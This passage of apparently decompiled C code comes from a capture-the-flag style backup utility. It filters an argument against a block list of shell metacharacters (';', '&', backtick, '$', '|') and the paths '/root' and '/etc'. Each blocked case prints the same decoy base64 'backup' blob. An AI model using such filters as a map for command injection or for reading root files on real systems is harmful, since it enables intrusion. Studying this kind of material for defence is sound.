 "a4AZKO/GtVMULlrpbpIFqZ98zwmROFstmPl/cITNYWBlLtJ5AmsyCxBybfLxHdJKHMsK6Rp4MO+wXrd/EZNxM8lnW6XNOVgnFHMBsxJkqsYIWlO0MM"
 "yU9L1CL2RRwm2QvbdD8PLWA/jp1fuYUdWxvQWt7NjmXo7crC1dA0BDPg5pVNxTrOc6lADp7xvGK/kP4F0eR+53a4dSL0b6xFnbL7WwRpcF+Ate/Ut2"
 "2WlFrg9A8gqBC8Ub1SnBU2b93ElbG9SFzno5TFmzXk3onbLaaEVZl9AKPA3sGEXZvVP+jueADQsokjJQwnzg1BRGFmqWbR6hxPagTVXBbQ+hytQdd2"
 "6PCuhmRUyNjEIBFx/XqkSOfAhLI9+Oe4FH3hYqb1W6xfZcLhpBs4Vwh7t2WGrEnUm2/F+X/OD+s9xeYniyUrBTEaOWKEv2NOUZudU6X2VOTX6QbHJr"
 "yLdSU9XLHB+nEGeq+sdtifdUGeFLct+Ee2pgR/AsSexKmzW09cx865KuxKnR3yoC6roUBb30Ijm5vQuzg/RM71P5ldpCK70RemYniiNeluBfHwQLOx"
 "kDn/8MN0CEBr1eFzkCNdblNBVA7b9m7GjoEhQXOpOpSGrXwbiHHm5C7Zn4kZtEy729ZOo71OVuT9i+4vCiWQLHrdxYkqiC7lmfCjMh9e05WEy1EBmP"
 "aFkYgxK2c6xWErsEv38++8xdqAcdEGXJBR2RT1TlxG/YlB4B7SwUem4xG6zJYi452F1klhkxloV6paNLWrcLwokdPJeCIrUbn+C9TesqoaaXASnict"
 "zNXUKzT905OFOcJwt7FbxyXk0z3FxD/tgtUHcFBLAQI/AzMDAQBjAG++IksAAAAA7QMAABgKAAAIAAsAAAAAAAAAIIC0gQAAAAByb290LnR4dAGZBw"
 "ACAEFFAQgAUEsFBgAAAAABAAEAQQAAAB4EAAAAAA==");
 exit(0);
 }
 if ( strstr(argv[3], "/root") )
 {
 displaySuccess("Finished! Encoded backup is below:\n");
 puts(
 "UEsDBDMDAQBjAG++IksAAAAA7QMAABgKAAAIAAsAcm9vdC50eHQBmQcAAgBBRQEIAEbBKBl0rFrayqfbwJ2YyHunnYq1Za6G7XLo8C3RH/hu0fArpS"
 "vYauq4AUycRmLuWvPyJk3sF+HmNMciNHfFNLD3LdkGmgwSW8j50xlO6SWiH5qU1Edz340bxpSlvaKvE4hnK/oan4wWPabhw/2rwaaJSXucU+pLgZor"
 "Y67Q/Y6cfA2hLWJabgeobKjMy0njgC9c8cQDaVrfE/ZiS1S+rPgz/e2Pc3lgkQ+lAVBqjo4zmpQltgIXauCdhvlA1Pe/BXhPQBJab7NVF6Xm3207Ef"
 "D3utbrcuUuQyF+rQhDCKsAEhqQ+Yyp1Tq2o6BvWJlhtWdts7rCubeoZPDBD6Mejp3XYkbSYYbzmgr1poNqnzT5XPiXnPwVqH1fG8OSO56xAvxx2mU2"
 "EP+Yhgo4OAghyW1sgV8FxenV8p5c+u9bTBTz/7WlQDI0HUsFAOHnWBTYR4HTvyi8OPZXKmwsPAG1hrlcrNDqPrpsmxxmVR8xSRbBDLSrH14pXYKPY/"
 "a4AZKO/GtVMULlrpbpIFqZ98zwmROFstmPl/cITNYWBlLtJ5AmsyCxBybfLxHdJKHMsK6Rp4MO+wXrd/EZNxM8lnW6XNOVgnFHMBsxJkqsYIWlO0MM"
 "yU9L1CL2RRwm2QvbdD8PLWA/jp1fuYUdWxvQWt7NjmXo7crC1dA0BDPg5pVNxTrOc6lADp7xvGK/kP4F0eR+53a4dSL0b6xFnbL7WwRpcF+Ate/Ut2"
 "2WlFrg9A8gqBC8Ub1SnBU2b93ElbG9SFzno5TFmzXk3onbLaaEVZl9AKPA3sGEXZvVP+jueADQsokjJQwnzg1BRGFmqWbR6hxPagTVXBbQ+hytQdd2"
 "6PCuhmRUyNjEIBFx/XqkSOfAhLI9+Oe4FH3hYqb1W6xfZcLhpBs4Vwh7t2WGrEnUm2/F+X/OD+s9xeYniyUrBTEaOWKEv2NOUZudU6X2VOTX6QbHJr"
 "yLdSU9XLHB+nEGeq+sdtifdUGeFLct+Ee2pgR/AsSexKmzW09cx865KuxKnR3yoC6roUBb30Ijm5vQuzg/RM71P5ldpCK70RemYniiNeluBfHwQLOx"
 "kDn/8MN0CEBr1eFzkCNdblNBVA7b9m7GjoEhQXOpOpSGrXwbiHHm5C7Zn4kZtEy729ZOo71OVuT9i+4vCiWQLHrdxYkqiC7lmfCjMh9e05WEy1EBmP"
 "aFkYgxK2c6xWErsEv38++8xdqAcdEGXJBR2RT1TlxG/YlB4B7SwUem4xG6zJYi452F1klhkxloV6paNLWrcLwokdPJeCIrUbn+C9TesqoaaXASnict"
 "zNXUKzT905OFOcJwt7FbxyXk0z3FxD/tgtUHcFBLAQI/AzMDAQBjAG++IksAAAAA7QMAABgKAAAIAAsAAAAAAAAAIIC0gQAAAAByb290LnR4dAGZBw"
 "ACAEFFAQgAUEsFBgAAAAABAAEAQQAAAB4EAAAAAA==");
 exit(0);
 }
 if ( strchr(argv[3], 59) )
 {
 displaySuccess("Finished! Encoded backup is below:\n");
 puts(
 "UEsDBDMDAQBjAG++IksAAAAA7QMAABgKAAAIAAsAcm9vdC50eHQBmQcAAgBBRQEIAEbBKBl0rFrayqfbwJ2YyHunnYq1Za6G7XLo8C3RH/hu0fArpS"
 "vYauq4AUycRmLuWvPyJk3sF+HmNMciNHfFNLD3LdkGmgwSW8j50xlO6SWiH5qU1Edz340bxpSlvaKvE4hnK/oan4wWPabhw/2rwaaJSXucU+pLgZor"
 "Y67Q/Y6cfA2hLWJabgeobKjMy0njgC9c8cQDaVrfE/ZiS1S+rPgz/e2Pc3lgkQ+lAVBqjo4zmpQltgIXauCdhvlA1Pe/BXhPQBJab7NVF6Xm3207Ef"
 "D3utbrcuUuQyF+rQhDCKsAEhqQ+Yyp1Tq2o6BvWJlhtWdts7rCubeoZPDBD6Mejp3XYkbSYYbzmgr1poNqnzT5XPiXnPwVqH1fG8OSO56xAvxx2mU2"
 "EP+Yhgo4OAghyW1sgV8FxenV8p5c+u9bTBTz/7WlQDI0HUsFAOHnWBTYR4HTvyi8OPZXKmwsPAG1hrlcrNDqPrpsmxxmVR8xSRbBDLSrH14pXYKPY/"
 "a4AZKO/GtVMULlrpbpIFqZ98zwmROFstmPl/cITNYWBlLtJ5AmsyCxBybfLxHdJKHMsK6Rp4MO+wXrd/EZNxM8lnW6XNOVgnFHMBsxJkqsYIWlO0MM"
 "yU9L1CL2RRwm2QvbdD8PLWA/jp1fuYUdWxvQWt7NjmXo7crC1dA0BDPg5pVNxTrOc6lADp7xvGK/kP4F0eR+53a4dSL0b6xFnbL7WwRpcF+Ate/Ut2"
 "2WlFrg9A8gqBC8Ub1SnBU2b93ElbG9SFzno5TFmzXk3onbLaaEVZl9AKPA3sGEXZvVP+jueADQsokjJQwnzg1BRGFmqWbR6hxPagTVXBbQ+hytQdd2"
 "6PCuhmRUyNjEIBFx/XqkSOfAhLI9+Oe4FH3hYqb1W6xfZcLhpBs4Vwh7t2WGrEnUm2/F+X/OD+s9xeYniyUrBTEaOWKEv2NOUZudU6X2VOTX6QbHJr"
 "yLdSU9XLHB+nEGeq+sdtifdUGeFLct+Ee2pgR/AsSexKmzW09cx865KuxKnR3yoC6roUBb30Ijm5vQuzg/RM71P5ldpCK70RemYniiNeluBfHwQLOx"
 "kDn/8MN0CEBr1eFzkCNdblNBVA7b9m7GjoEhQXOpOpSGrXwbiHHm5C7Zn4kZtEy729ZOo71OVuT9i+4vCiWQLHrdxYkqiC7lmfCjMh9e05WEy1EBmP"
 "aFkYgxK2c6xWErsEv38++8xdqAcdEGXJBR2RT1TlxG/YlB4B7SwUem4xG6zJYi452F1klhkxloV6paNLWrcLwokdPJeCIrUbn+C9TesqoaaXASnict"
 "zNXUKzT905OFOcJwt7FbxyXk0z3FxD/tgtUHcFBLAQI/AzMDAQBjAG++IksAAAAA7QMAABgKAAAIAAsAAAAAAAAAIIC0gQAAAAByb290LnR4dAGZBw"
 "ACAEFFAQgAUEsFBgAAAAABAAEAQQAAAB4EAAAAAA==");
 exit(0);
 }
 if ( strchr(argv[3], 38) )
 {
 displaySuccess("Finished! Encoded backup is below:\n");
 puts(
 "UEsDBDMDAQBjAG++IksAAAAA7QMAABgKAAAIAAsAcm9vdC50eHQBmQcAAgBBRQEIAEbBKBl0rFrayqfbwJ2YyHunnYq1Za6G7XLo8C3RH/hu0fArpS"
 "vYauq4AUycRmLuWvPyJk3sF+HmNMciNHfFNLD3LdkGmgwSW8j50xlO6SWiH5qU1Edz340bxpSlvaKvE4hnK/oan4wWPabhw/2rwaaJSXucU+pLgZor"
 "Y67Q/Y6cfA2hLWJabgeobKjMy0njgC9c8cQDaVrfE/ZiS1S+rPgz/e2Pc3lgkQ+lAVBqjo4zmpQltgIXauCdhvlA1Pe/BXhPQBJab7NVF6Xm3207Ef"
 "D3utbrcuUuQyF+rQhDCKsAEhqQ+Yyp1Tq2o6BvWJlhtWdts7rCubeoZPDBD6Mejp3XYkbSYYbzmgr1poNqnzT5XPiXnPwVqH1fG8OSO56xAvxx2mU2"
 "EP+Yhgo4OAghyW1sgV8FxenV8p5c+u9bTBTz/7WlQDI0HUsFAOHnWBTYR4HTvyi8OPZXKmwsPAG1hrlcrNDqPrpsmxxmVR8xSRbBDLSrH14pXYKPY/"
 "a4AZKO/GtVMULlrpbpIFqZ98zwmROFstmPl/cITNYWBlLtJ5AmsyCxBybfLxHdJKHMsK6Rp4MO+wXrd/EZNxM8lnW6XNOVgnFHMBsxJkqsYIWlO0MM"
 "yU9L1CL2RRwm2QvbdD8PLWA/jp1fuYUdWxvQWt7NjmXo7crC1dA0BDPg5pVNxTrOc6lADp7xvGK/kP4F0eR+53a4dSL0b6xFnbL7WwRpcF+Ate/Ut2"
 "2WlFrg9A8gqBC8Ub1SnBU2b93ElbG9SFzno5TFmzXk3onbLaaEVZl9AKPA3sGEXZvVP+jueADQsokjJQwnzg1BRGFmqWbR6hxPagTVXBbQ+hytQdd2"
 "6PCuhmRUyNjEIBFx/XqkSOfAhLI9+Oe4FH3hYqb1W6xfZcLhpBs4Vwh7t2WGrEnUm2/F+X/OD+s9xeYniyUrBTEaOWKEv2NOUZudU6X2VOTX6QbHJr"
 "yLdSU9XLHB+nEGeq+sdtifdUGeFLct+Ee2pgR/AsSexKmzW09cx865KuxKnR3yoC6roUBb30Ijm5vQuzg/RM71P5ldpCK70RemYniiNeluBfHwQLOx"
 "kDn/8MN0CEBr1eFzkCNdblNBVA7b9m7GjoEhQXOpOpSGrXwbiHHm5C7Zn4kZtEy729ZOo71OVuT9i+4vCiWQLHrdxYkqiC7lmfCjMh9e05WEy1EBmP"
 "aFkYgxK2c6xWErsEv38++8xdqAcdEGXJBR2RT1TlxG/YlB4B7SwUem4xG6zJYi452F1klhkxloV6paNLWrcLwokdPJeCIrUbn+C9TesqoaaXASnict"
 "zNXUKzT905OFOcJwt7FbxyXk0z3FxD/tgtUHcFBLAQI/AzMDAQBjAG++IksAAAAA7QMAABgKAAAIAAsAAAAAAAAAIIC0gQAAAAByb290LnR4dAGZBw"
 "ACAEFFAQgAUEsFBgAAAAABAAEAQQAAAB4EAAAAAA==");
 exit(0);
 }
 if ( strchr(argv[3], 96) )
 {
 displaySuccess("Finished! Encoded backup is below:\n");
 puts(
 "UEsDBDMDAQBjAG++IksAAAAA7QMAABgKAAAIAAsAcm9vdC50eHQBmQcAAgBBRQEIAEbBKBl0rFrayqfbwJ2YyHunnYq1Za6G7XLo8C3RH/hu0fArpS"
 "vYauq4AUycRmLuWvPyJk3sF+HmNMciNHfFNLD3LdkGmgwSW8j50xlO6SWiH5qU1Edz340bxpSlvaKvE4hnK/oan4wWPabhw/2rwaaJSXucU+pLgZor"
 "Y67Q/Y6cfA2hLWJabgeobKjMy0njgC9c8cQDaVrfE/ZiS1S+rPgz/e2Pc3lgkQ+lAVBqjo4zmpQltgIXauCdhvlA1Pe/BXhPQBJab7NVF6Xm3207Ef"
 "D3utbrcuUuQyF+rQhDCKsAEhqQ+Yyp1Tq2o6BvWJlhtWdts7rCubeoZPDBD6Mejp3XYkbSYYbzmgr1poNqnzT5XPiXnPwVqH1fG8OSO56xAvxx2mU2"
 "EP+Yhgo4OAghyW1sgV8FxenV8p5c+u9bTBTz/7WlQDI0HUsFAOHnWBTYR4HTvyi8OPZXKmwsPAG1hrlcrNDqPrpsmxxmVR8xSRbBDLSrH14pXYKPY/"
 "a4AZKO/GtVMULlrpbpIFqZ98zwmROFstmPl/cITNYWBlLtJ5AmsyCxBybfLxHdJKHMsK6Rp4MO+wXrd/EZNxM8lnW6XNOVgnFHMBsxJkqsYIWlO0MM"
 "yU9L1CL2RRwm2QvbdD8PLWA/jp1fuYUdWxvQWt7NjmXo7crC1dA0BDPg5pVNxTrOc6lADp7xvGK/kP4F0eR+53a4dSL0b6xFnbL7WwRpcF+Ate/Ut2"
 "2WlFrg9A8gqBC8Ub1SnBU2b93ElbG9SFzno5TFmzXk3onbLaaEVZl9AKPA3sGEXZvVP+jueADQsokjJQwnzg1BRGFmqWbR6hxPagTVXBbQ+hytQdd2"
 "6PCuhmRUyNjEIBFx/XqkSOfAhLI9+Oe4FH3hYqb1W6xfZcLhpBs4Vwh7t2WGrEnUm2/F+X/OD+s9xeYniyUrBTEaOWKEv2NOUZudU6X2VOTX6QbHJr"
 "yLdSU9XLHB+nEGeq+sdtifdUGeFLct+Ee2pgR/AsSexKmzW09cx865KuxKnR3yoC6roUBb30Ijm5vQuzg/RM71P5ldpCK70RemYniiNeluBfHwQLOx"
 "kDn/8MN0CEBr1eFzkCNdblNBVA7b9m7GjoEhQXOpOpSGrXwbiHHm5C7Zn4kZtEy729ZOo71OVuT9i+4vCiWQLHrdxYkqiC7lmfCjMh9e05WEy1EBmP"
 "aFkYgxK2c6xWErsEv38++8xdqAcdEGXJBR2RT1TlxG/YlB4B7SwUem4xG6zJYi452F1klhkxloV6paNLWrcLwokdPJeCIrUbn+C9TesqoaaXASnict"
 "zNXUKzT905OFOcJwt7FbxyXk0z3FxD/tgtUHcFBLAQI/AzMDAQBjAG++IksAAAAA7QMAABgKAAAIAAsAAAAAAAAAIIC0gQAAAAByb290LnR4dAGZBw"
 "ACAEFFAQgAUEsFBgAAAAABAAEAQQAAAB4EAAAAAA==");
 exit(0);
 }
 if ( strchr(argv[3], 36) )
 {
 displaySuccess("Finished! Encoded backup is below:\n");
 puts(
 "UEsDBDMDAQBjAG++IksAAAAA7QMAABgKAAAIAAsAcm9vdC50eHQBmQcAAgBBRQEIAEbBKBl0rFrayqfbwJ2YyHunnYq1Za6G7XLo8C3RH/hu0fArpS"
 "vYauq4AUycRmLuWvPyJk3sF+HmNMciNHfFNLD3LdkGmgwSW8j50xlO6SWiH5qU1Edz340bxpSlvaKvE4hnK/oan4wWPabhw/2rwaaJSXucU+pLgZor"
 "Y67Q/Y6cfA2hLWJabgeobKjMy0njgC9c8cQDaVrfE/ZiS1S+rPgz/e2Pc3lgkQ+lAVBqjo4zmpQltgIXauCdhvlA1Pe/BXhPQBJab7NVF6Xm3207Ef"
 "D3utbrcuUuQyF+rQhDCKsAEhqQ+Yyp1Tq2o6BvWJlhtWdts7rCubeoZPDBD6Mejp3XYkbSYYbzmgr1poNqnzT5XPiXnPwVqH1fG8OSO56xAvxx2mU2"
 "EP+Yhgo4OAghyW1sgV8FxenV8p5c+u9bTBTz/7WlQDI0HUsFAOHnWBTYR4HTvyi8OPZXKmwsPAG1hrlcrNDqPrpsmxxmVR8xSRbBDLSrH14pXYKPY/"
 "a4AZKO/GtVMULlrpbpIFqZ98zwmROFstmPl/cITNYWBlLtJ5AmsyCxBybfLxHdJKHMsK6Rp4MO+wXrd/EZNxM8lnW6XNOVgnFHMBsxJkqsYIWlO0MM"
 "yU9L1CL2RRwm2QvbdD8PLWA/jp1fuYUdWxvQWt7NjmXo7crC1dA0BDPg5pVNxTrOc6lADp7xvGK/kP4F0eR+53a4dSL0b6xFnbL7WwRpcF+Ate/Ut2"
 "2WlFrg9A8gqBC8Ub1SnBU2b93ElbG9SFzno5TFmzXk3onbLaaEVZl9AKPA3sGEXZvVP+jueADQsokjJQwnzg1BRGFmqWbR6hxPagTVXBbQ+hytQdd2"
 "6PCuhmRUyNjEIBFx/XqkSOfAhLI9+Oe4FH3hYqb1W6xfZcLhpBs4Vwh7t2WGrEnUm2/F+X/OD+s9xeYniyUrBTEaOWKEv2NOUZudU6X2VOTX6QbHJr"
 "yLdSU9XLHB+nEGeq+sdtifdUGeFLct+Ee2pgR/AsSexKmzW09cx865KuxKnR3yoC6roUBb30Ijm5vQuzg/RM71P5ldpCK70RemYniiNeluBfHwQLOx"
 "kDn/8MN0CEBr1eFzkCNdblNBVA7b9m7GjoEhQXOpOpSGrXwbiHHm5C7Zn4kZtEy729ZOo71OVuT9i+4vCiWQLHrdxYkqiC7lmfCjMh9e05WEy1EBmP"
 "aFkYgxK2c6xWErsEv38++8xdqAcdEGXJBR2RT1TlxG/YlB4B7SwUem4xG6zJYi452F1klhkxloV6paNLWrcLwokdPJeCIrUbn+C9TesqoaaXASnict"
 "zNXUKzT905OFOcJwt7FbxyXk0z3FxD/tgtUHcFBLAQI/AzMDAQBjAG++IksAAAAA7QMAABgKAAAIAAsAAAAAAAAAIIC0gQAAAAByb290LnR4dAGZBw"
 "ACAEFFAQgAUEsFBgAAAAABAAEAQQAAAB4EAAAAAA==");
 exit(0);
 }
 if ( strchr(argv[3], 124) )
 {
 displaySuccess("Finished! Encoded backup is below:\n");
 puts(
 "UEsDBDMDAQBjAG++IksAAAAA7QMAABgKAAAIAAsAcm9vdC50eHQBmQcAAgBBRQEIAEbBKBl0rFrayqfbwJ2YyHunnYq1Za6G7XLo8C3RH/hu0fArpS"
 "vYauq4AUycRmLuWvPyJk3sF+HmNMciNHfFNLD3LdkGmgwSW8j50xlO6SWiH5qU1Edz340bxpSlvaKvE4hnK/oan4wWPabhw/2rwaaJSXucU+pLgZor"
 "Y67Q/Y6cfA2hLWJabgeobKjMy0njgC9c8cQDaVrfE/ZiS1S+rPgz/e2Pc3lgkQ+lAVBqjo4zmpQltgIXauCdhvlA1Pe/BXhPQBJab7NVF6Xm3207Ef"
 "D3utbrcuUuQyF+rQhDCKsAEhqQ+Yyp1Tq2o6BvWJlhtWdts7rCubeoZPDBD6Mejp3XYkbSYYbzmgr1poNqnzT5XPiXnPwVqH1fG8OSO56xAvxx2mU2"
 "EP+Yhgo4OAghyW1sgV8FxenV8p5c+u9bTBTz/7WlQDI0HUsFAOHnWBTYR4HTvyi8OPZXKmwsPAG1hrlcrNDqPrpsmxxmVR8xSRbBDLSrH14pXYKPY/"
 "a4AZKO/GtVMULlrpbpIFqZ98zwmROFstmPl/cITNYWBlLtJ5AmsyCxBybfLxHdJKHMsK6Rp4MO+wXrd/EZNxM8lnW6XNOVgnFHMBsxJkqsYIWlO0MM"
 "yU9L1CL2RRwm2QvbdD8PLWA/jp1fuYUdWxvQWt7NjmXo7crC1dA0BDPg5pVNxTrOc6lADp7xvGK/kP4F0eR+53a4dSL0b6xFnbL7WwRpcF+Ate/Ut2"
 "2WlFrg9A8gqBC8Ub1SnBU2b93ElbG9SFzno5TFmzXk3onbLaaEVZl9AKPA3sGEXZvVP+jueADQsokjJQwnzg1BRGFmqWbR6hxPagTVXBbQ+hytQdd2"
 "6PCuhmRUyNjEIBFx/XqkSOfAhLI9+Oe4FH3hYqb1W6xfZcLhpBs4Vwh7t2WGrEnUm2/F+X/OD+s9xeYniyUrBTEaOWKEv2NOUZudU6X2VOTX6QbHJr"
 "yLdSU9XLHB+nEGeq+sdtifdUGeFLct+Ee2pgR/AsSexKmzW09cx865KuxKnR3yoC6roUBb30Ijm5vQuzg/RM71P5ldpCK70RemYniiNeluBfHwQLOx"
 "kDn/8MN0CEBr1eFzkCNdblNBVA7b9m7GjoEhQXOpOpSGrXwbiHHm5C7Zn4kZtEy729ZOo71OVuT9i+4vCiWQLHrdxYkqiC7lmfCjMh9e05WEy1EBmP"
 "aFkYgxK2c6xWErsEv38++8xdqAcdEGXJBR2RT1TlxG/YlB4B7SwUem4xG6zJYi452F1klhkxloV6paNLWrcLwokdPJeCIrUbn+C9TesqoaaXASnict"
 "zNXUKzT905OFOcJwt7FbxyXk0z3FxD/tgtUHcFBLAQI/AzMDAQBjAG++IksAAAAA7QMAABgKAAAIAAsAAAAAAAAAIIC0gQAAAAByb290LnR4dAGZBw"
 "ACAEFFAQgAUEsFBgAAAAABAAEAQQAAAB4EAAAAAA==");
 exit(0);
 }
 if ( strstr(argv[3], "//") )
 {
 displaySuccess("Finished! Encoded backup is below:\n");
 puts(
 "UEsDBDMDAQBjAG++IksAAAAA7QMAABgKAAAIAAsAcm9vdC50eHQBmQcAAgBBRQEIAEbBKBl0rFrayqfbwJ2YyHunnYq1Za6G7XLo8C3RH/hu0fArpS"
 "vYauq4AUycRmLuWvPyJk3sF+HmNMciNHfFNLD3LdkGmgwSW8j50xlO6SWiH5qU1Edz340bxpSlvaKvE4hnK/oan4wWPabhw/2rwaaJSXucU+pLgZor"
 "Y67Q/Y6cfA2hLWJabgeobKjMy0njgC9c8cQDaVrfE/ZiS1S+rPgz/e2Pc3lgkQ+lAVBqjo4zmpQltgIXauCdhvlA1Pe/BXhPQBJab7NVF6Xm3207Ef"
 "D3utbrcuUuQyF+rQhDCKsAEhqQ+Yyp1Tq2o6BvWJlhtWdts7rCubeoZPDBD6Mejp3XYkbSYYbzmgr1poNqnzT5XPiXnPwVqH1fG8OSO56xAvxx2mU2"
 "EP+Yhgo4OAghyW1sgV8FxenV8p5c+u9bTBTz/7WlQDI0HUsFAOHnWBTYR4HTvyi8OPZXKmwsPAG1hrlcrNDqPrpsmxxmVR8xSRbBDLSrH14pXYKPY/"
 "a4AZKO/GtVMULlrpbpIFqZ98zwmROFstmPl/cITNYWBlLtJ5AmsyCxBybfLxHdJKHMsK6Rp4MO+wXrd/EZNxM8lnW6XNOVgnFHMBsxJkqsYIWlO0MM"
 "yU9L1CL2RRwm2QvbdD8PLWA/jp1fuYUdWxvQWt7NjmXo7crC1dA0BDPg5pVNxTrOc6lADp7xvGK/kP4F0eR+53a4dSL0b6xFnbL7WwRpcF+Ate/Ut2"
 "2WlFrg9A8gqBC8Ub1SnBU2b93ElbG9SFzno5TFmzXk3onbLaaEVZl9AKPA3sGEXZvVP+jueADQsokjJQwnzg1BRGFmqWbR6hxPagTVXBbQ+hytQdd2"
 "6PCuhmRUyNjEIBFx/XqkSOfAhLI9+Oe4FH3hYqb1W6xfZcLhpBs4Vwh7t2WGrEnUm2/F+X/OD+s9xeYniyUrBTEaOWKEv2NOUZudU6X2VOTX6QbHJr"
 "yLdSU9XLHB+nEGeq+sdtifdUGeFLct+Ee2pgR/AsSexKmzW09cx865KuxKnR3yoC6roUBb30Ijm5vQuzg/RM71P5ldpCK70RemYniiNeluBfHwQLOx"
 "kDn/8MN0CEBr1eFzkCNdblNBVA7b9m7GjoEhQXOpOpSGrXwbiHHm5C7Zn4kZtEy729ZOo71OVuT9i+4vCiWQLHrdxYkqiC7lmfCjMh9e05WEy1EBmP"
 "aFkYgxK2c6xWErsEv38++8xdqAcdEGXJBR2RT1TlxG/YlB4B7SwUem4xG6zJYi452F1klhkxloV6paNLWrcLwokdPJeCIrUbn+C9TesqoaaXASnict"
 "zNXUKzT905OFOcJwt7FbxyXk0z3FxD/tgtUHcFBLAQI/AzMDAQBjAG++IksAAAAA7QMAABgKAAAIAAsAAAAAAAAAIIC0gQAAAAByb290LnR4dAGZBw"
 "ACAEFFAQgAUEsFBgAAAAABAAEAQQAAAB4EAAAAAA==");
 exit(0);
 }
 if ( !strcmp(argv[3], "/") )
 {
 displaySuccess("Finished! Encoded backup is below:\n");
 puts(
 "UEsDBDMDAQBjAG++IksAAAAA7QMAABgKAAAIAAsAcm9vdC50eHQBmQcAAgBBRQEIAEbBKBl0rFrayqfbwJ2YyHunnYq1Za6G7XLo8C3RH/hu0fArpS"
 "vYauq4AUycRmLuWvPyJk3sF+HmNMciNHfFNLD3LdkGmgwSW8j50xlO6SWiH5qU1Edz340bxpSlvaKvE4hnK/oan4wWPabhw/2rwaaJSXucU+pLgZor"
 "Y67Q/Y6cfA2hLWJabgeobKjMy0njgC9c8cQDaVrfE/ZiS1S+rPgz/e2Pc3lgkQ+lAVBqjo4zmpQltgIXauCdhvlA1Pe/BXhPQBJab7NVF6Xm3207Ef"
 "D3utbrcuUuQyF+rQhDCKsAEhqQ+Yyp1Tq2o6BvWJlhtWdts7rCubeoZPDBD6Mejp3XYkbSYYbzmgr1poNqnzT5XPiXnPwVqH1fG8OSO56xAvxx2mU2"
 "EP+Yhgo4OAghyW1sgV8FxenV8p5c+u9bTBTz/7WlQDI0HUsFAOHnWBTYR4HTvyi8OPZXKmwsPAG1hrlcrNDqPrpsmxxmVR8xSRbBDLSrH14pXYKPY/"
 "a4AZKO/GtVMULlrpbpIFqZ98zwmROFstmPl/cITNYWBlLtJ5AmsyCxBybfLxHdJKHMsK6Rp4MO+wXrd/EZNxM8lnW6XNOVgnFHMBsxJkqsYIWlO0MM"
 "yU9L1CL2RRwm2QvbdD8PLWA/jp1fuYUdWxvQWt7NjmXo7crC1dA0BDPg5pVNxTrOc6lADp7xvGK/kP4F0eR+53a4dSL0b6xFnbL7WwRpcF+Ate/Ut2"
 "2WlFrg9A8gqBC8Ub1SnBU2b93ElbG9SFzno5TFmzXk3onbLaaEVZl9AKPA3sGEXZvVP+jueADQsokjJQwnzg1BRGFmqWbR6hxPagTVXBbQ+hytQdd2"
 "6PCuhmRUyNjEIBFx/XqkSOfAhLI9+Oe4FH3hYqb1W6xfZcLhpBs4Vwh7t2WGrEnUm2/F+X/OD+s9xeYniyUrBTEaOWKEv2NOUZudU6X2VOTX6QbHJr"
 "yLdSU9XLHB+nEGeq+sdtifdUGeFLct+Ee2pgR/AsSexKmzW09cx865KuxKnR3yoC6roUBb30Ijm5vQuzg/RM71P5ldpCK70RemYniiNeluBfHwQLOx"
 "kDn/8MN0CEBr1eFzkCNdblNBVA7b9m7GjoEhQXOpOpSGrXwbiHHm5C7Zn4kZtEy729ZOo71OVuT9i+4vCiWQLHrdxYkqiC7lmfCjMh9e05WEy1EBmP"
 "aFkYgxK2c6xWErsEv38++8xdqAcdEGXJBR2RT1TlxG/YlB4B7SwUem4xG6zJYi452F1klhkxloV6paNLWrcLwokdPJeCIrUbn+C9TesqoaaXASnict"
 "zNXUKzT905OFOcJwt7FbxyXk0z3FxD/tgtUHcFBLAQI/AzMDAQBjAG++IksAAAAA7QMAABgKAAAIAAsAAAAAAAAAIIC0gQAAAAByb290LnR4dAGZBw"
 "ACAEFFAQgAUEsFBgAAAAABAAEAQQAAAB4EAAAAAA==");
 exit(0);
 }
 if ( strstr(argv[3], "/etc") )
 {
 displaySuccess("Finished! Encoded backup is below:\n");
 puts(
 "UEsDBDMDAQBjAG++IksAAAAA7QMAABgKAAAIAAsAcm9vdC50eHQBmQcAAgBBRQEIAEbBKBl0rFrayqfbwJ2YyHunnYq1Za6G7XLo8C3RH/hu0fArpS"
 "vYauq4AUycRmLuWvPyJk3sF+HmNMciNHfFNLD3LdkGmgwSW8j50xlO6SWiH5qU1Edz340bxpSlvaKvE4hnK/oan4wWPabhw/2rwaaJSXucU+pLgZor"
 "Y67Q/Y6cfA2hLWJabgeobKjMy0njgC9c8cQDaVrfE/ZiS1S+rPgz/e2Pc3lgkQ+lAVBqjo4zmpQltgIXauCdhvlA1Pe/BXhPQBJab7NVF6Xm3207Ef"
 "D3utbrcuUuQyF+rQhDCKsAEhqQ+Yyp1Tq2o6BvWJlhtWdts7rCubeoZPDBD6Mejp3XYkbSYYbzmgr1poNqnzT5XPiXnPwVqH1fG8OSO56xAvxx2mU2"
 "EP+Yhgo4OAghyW1sgV8FxenV8p5c+u9bTBTz/7WlQDI0HUsFAOHnWBTYR4HTvyi8OPZXKmwsPAG1hrlcrNDqPrpsmxxmVR8xSRbBDLSrH14pXYKPY/"
 "a4AZKO/GtVMULlrpbpIFqZ98zwmROFstmPl/cITNYWBlLtJ5AmsyCxBybfLxHdJKHMsK6Rp4MO+wXrd/EZNxM8lnW6XNOVgnFHMBsxJkqsYIWlO0MM"
 "yU9L1CL2RRwm2QvbdD8PLWA/jp1fuYUdWxvQWt7NjmXo7crC1dA0BDPg5pVNxTrOc6lADp7xvGK/kP4F0eR+53a4dSL0b6xFnbL7WwRpcF+Ate/Ut2"
 "2WlFrg9A8gqBC8Ub1SnBU2b93ElbG9SFzno5TFmzXk3onbLaaEVZl9AKPA3sGEXZvVP+jueADQsokjJQwnzg1BRGFmqWbR6hxPagTVXBbQ+hytQdd2"
 "6PCuhmRUyNjEIBFx/XqkSOfAhLI9+Oe4FH3hYqb1W6xfZcLhpBs4Vwh7t2WGrEnUm2/F+X/OD+s9xeYniyUrBTEaOWKEv2NOUZudU6X2VOTX6QbHJr"
 "yLdSU9XLHB+nEGeq+sdtifdUGeFLct+Ee2pgR/AsSexKmzW09cx865KuxKnR3yoC6roUBb30Ijm5vQuzg/RM71P5ldpCK70RemYniiNeluBfHwQLOx"
 "kDn/8MN0CEBr1eFzkCNdblNBVA7b9m7GjoEhQXOpOpSGrXwbiHHm5C7Zn4kZtEy729ZOo71OVuT9i+4vCiWQLHrdxYkqiC7lmfCjMh9e05WEy1EBmP"
 "aFkYgxK2c6xWErsEv38++8xdqAcdEGXJBR2RT1TlxG/YlB4B7SwUem4xG6zJYi452F1klhkxloV6paNLWrcLwokdPJeCIrUbn+C9TesqoaaXASnict"
